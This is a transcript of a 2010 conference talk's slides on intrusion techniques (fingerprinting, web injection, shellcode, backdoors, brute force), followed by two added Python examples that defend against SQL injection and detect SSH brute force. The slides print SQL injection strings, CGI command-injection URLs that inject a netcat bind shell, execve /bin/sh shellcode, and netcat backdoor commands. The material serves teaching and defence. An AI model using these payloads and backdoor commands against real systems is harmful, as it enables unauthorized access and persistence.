Intrusion Techniques

Various attack techniques will be demonstrated, such as code injection, brute force, backdoors, rootkits, exploits and several other ways of gaining and improperly keeping access to servers; in return, best practices for avoiding the kinds of attacks mentioned are discussed. (Talk given at the 3rd Free Software Festival in Belo Horizonte - FSLBH)

Transcript

  • 1. Intrusion Techniques. DcLabs Hacking Tour 2010. Ewerson Guimarães (Crash), Rener Silva (Gr1nch)
  • 2. Agenda: FingerPrint, Web-Bugs, Backdoors, MetaSploit, Brute Force, IIS SemiColon, ShellCode, Man-in-the-Middle, Exploits, Sniffers, Scanners/Fuzzers
  • 3. FingerPrint: grab information about a target host. It is used to identify the operating system and/or service (daemon) version number through the unique characteristics of the target's TCP/IP responses. The best tool for discovering operating systems, services, devices and more: NMAP (Network Mapper). Basic commands:
      nmap host          (basic)
      nmap -sV host      (service versions)
      nmap -P0 host      (ignore ICMP echo-reply)
      nmap -O host       (try to grab the O.S. version)
      nmap -f host       (firewall/IDS/IPS evasion)
  • 4. Passive FingerPrint. The fields an operating system fills in its own way:
      TTL - what the operating system sets the Time To Live to on the outbound packet
      Window Size - what the operating system sets the window size to
      DF - whether the operating system sets the Don't Fragment bit
      TOS - whether the operating system sets the Type of Service, and if so, to what
  • 5. FingerPrint Matrix:
  • 6. FingerPrint U. Bourne
  • 7. Web Vulnerability. These vulnerabilities are initially exploited through malicious browser requests, compromising the target in a matter of minutes: SQL-Injection, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), CGI Command Injection, PHP-Injection
  • 8. Web Vulnerability: SQL-Injection. It occurs when the attacker can insert a series of SQL statements into a query by manipulating the application's data entry. Original query:
      SELECT campos FROM tabela WHERE campo = 'test@test.com';
    Injected string: some' OR 'x'='x
    Resulting query:
      SELECT fields FROM table WHERE field = 'some' OR 'x'='x';
    Other classic injection strings from the slide:
      admin'--
      " or 0=0 #
      ' or 1=1--
      hi' or 'a'='a
      ' or 0=0 --
      or 0=0 #
      " or 1=1--
      hi') or ('a'='a
      " or 0=0 --
      ' or 'x'='x
      or 1=1--
      hi") or ("a"="a
  • 9. SQL-Injection
  • 10. Web Vulnerability: CGI Command Injection. It occurs when the attacker inserts a series of commands, exploiting vulnerable CGI scripts. Examples from the slide:
    Nagios:
      https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
    DD-WRT:
      http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh
    Linksys Wireless:
      /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
  • 11. ShellCode Introduction. The C program below spawns a shell with execve; the byte string is the same execve("/bin/sh") call (system call 11, int 0x80) written as position-independent x86 machine code, which is what gets placed in a buffer during exploitation:
      #include <stdio.h>
      #include <unistd.h>

      int main(void) {
          char *comando[2];          /* comando = command */
          comando[0] = "/bin/sh";
          comando[1] = NULL;
          execve(comando[0], comando, NULL);
          return 0;
      }

      char shellcode[] =
          "\xeb\x1f\x5e\x89\x76\x0a\x31\xc0\x88\x46\x09\x89\x46\x0e\xb0\x0b\x89"
          "\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
          "\xdc\xff\xff\xff/bin/sh";
  • 12. Exploits. Kinds of exploits: Local: usually the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or Administrator; they are written to exploit kernel bugs or suid binaries. Remote: works over a network connection and exploits the vulnerable target without any prior access to it. Sources: www.securityfocus.com, www.milw0rm.com, www.secunia.com, www.exploit-db.com. 0-days: usually an unpublished exploit for a brand new vulnerability. You can buy! $$$$$
  • 13. Backdoors/RootKits. Backdoors are used to maintain access to the system. We can use Netcat for this purpose:
      nc -vv -l -p 5555
      nc -vv -l -p 5555 -e /bin/bash
      nc <ip> <port>
    RootKits: the main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target system. Examples: hide files (matching strings), run a command when a string matches, hide processes, hide open ports, and others.
  • 14. Default/Weak passwords. Default passwords are set by the manufacturer/developer and were not changed after installation/configuration: they are supplied by the system vendor and meant to be changed at installation time (nobody does this shit). Ex: 3Com switch: user security, pass security; FireBird: user sysdba, pass masterkey. Weak passwords are easily guessed or follow a keyboard sequence. Ex: 123456, love, house phone number, birthday, etc.
  • 15. Brute Force consists of using random combinations of characters, numbers and symbols, wordlists and/or string generators to crack a password. Ex: John the Ripper, Hydra (SSH brute force)
  • 16. Brute Force: DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers
  • 17. Scanners/Fuzzers. There are two types of scanners: specific ones, written for a specific vulnerability (BSQLHacker, SQLMAP), and generic ones, written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets/vulnerabilities: Saint, W3af, Nexpose Community
  • 18. Scanners/Fuzzers Nexpose Community
  • 19. Scanners/Fuzzers W3af
  • 20. Scanners/Fuzzers Saint
  • 21. Sniffers. A sniffer monitors and analyzes network traffic. Some of the captured packets may contain critical information (such as logins, passwords and other cool info). Wireshark
  • 22. DoS (Denial of Service) consists of attempts to prevent valid users from using a particular feature, or simply to take it down: SYN flood, UDP packet storm, DDoS, Smurf attack
  • 23. MetaSploit
  • 24. MetaSploit
  • 25. IIS SemiColon Secure it? Wtf?
  • 26. Man-in-the-Middle
  • 27. Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. http://hntool.net
  • 28. UAI? crash@dclabs.com.br irc.freenode.net #dclabs gr1nch@dclabs.com.br #securityguys
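Slide 8's injection strings from the defender's side: an added example (not code from the talk) that runs two of the slide's payloads against a login query built by string concatenation and against the same query with bound parameters. The users table, credentials and e-mail addresses are constructed for the demo.

```python
import sqlite3

# Constructed in-memory table for the demo (not from the slides). Passwords are
# stored in clear text only to keep the example short; real code stores a hash.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin@test.com", "Sup3rSecret", "admin"),
        ("test@test.com", "hunter2", "user"),
    ])
    return conn

def login_vulnerable(conn, email, password):
    # String concatenation: quotes in the input become part of the SQL grammar,
    # which is exactly what slide 8's payloads rely on.
    sql = ("SELECT role FROM users WHERE email = '" + email +
           "' AND password = '" + password + "'")
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if rows else None

def login_parameterized(conn, email, password):
    # Bound parameters: the driver passes values separately from the statement,
    # so a quote or '--' in the input is compared as data, never parsed as SQL.
    sql = "SELECT role FROM users WHERE email = ? AND password = ?"
    rows = conn.execute(sql, (email, password)).fetchall()
    return rows[0][0] if rows else None

# Two payload shapes shown on slide 8.
COMMENT_OUT = "admin@test.com'--"   # comments out the password check
TAUTOLOGY = "' OR 'x'='x"           # makes the WHERE clause always true

if __name__ == "__main__":
    conn = build_db()
    print(login_vulnerable(conn, COMMENT_OUT, "wrong"))           # admin
    print(login_vulnerable(conn, "nobody", TAUTOLOGY))            # admin
    print(login_parameterized(conn, COMMENT_OUT, "wrong"))        # None
    print(login_parameterized(conn, "nobody", TAUTOLOGY))         # None
    print(login_parameterized(conn, "test@test.com", "hunter2"))  # user
```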
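The SSH brute force of slide 15 as it looks in the server's logs: an added example (not from the talk) that flags sources with many failed logins or several user names tried in sshd log lines. The log lines, host name, addresses and thresholds are constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed sshd log lines for the demo (not taken from the slides).
SAMPLE_LOG = """\
Oct 12 10:00:01 web1 sshd[2101]: Failed password for root from 203.0.113.9 port 40101 ssh2
Oct 12 10:00:02 web1 sshd[2102]: Failed password for root from 203.0.113.9 port 40102 ssh2
Oct 12 10:00:02 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.9 port 40103 ssh2
Oct 12 10:00:03 web1 sshd[2104]: Failed password for invalid user test from 203.0.113.9 port 40104 ssh2
Oct 12 10:00:03 web1 sshd[2105]: Failed password for root from 203.0.113.9 port 40105 ssh2
Oct 12 10:00:04 web1 sshd[2106]: Failed password for invalid user guest from 203.0.113.9 port 40106 ssh2
Oct 12 10:00:09 web1 sshd[2107]: Failed password for alice from 198.51.100.4 port 50001 ssh2
Oct 12 10:00:15 web1 sshd[2108]: Accepted password for alice from 198.51.100.4 port 50002 ssh2
"""

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user admin from ..." (user-name guessing).
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")

def failed_logins_by_source(log_text):
    """Return {source_ip: (failure_count, {user names tried})}."""
    counts = defaultdict(int)
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            counts[ip] += 1
            users[ip].add(user)
    return {ip: (counts[ip], users[ip]) for ip in counts}

def brute_force_sources(log_text, max_failures=5, max_users=3):
    """Sources at or above the failure threshold, or cycling through user names."""
    hits = failed_logins_by_source(log_text)
    return sorted(ip for ip, (n, u) in hits.items()
                  if n >= max_failures or len(u) >= max_users)

if __name__ == "__main__":
    for ip, (n, u) in failed_logins_by_source(SAMPLE_LOG).items():
        print(f"{ip}: {n} failures, users tried: {sorted(u)}")
    print("suspected brute force:", brute_force_sources(SAMPLE_LOG))
```

A single typo by alice stays below both thresholds, while the wordlist run against root and guessed accounts is reported.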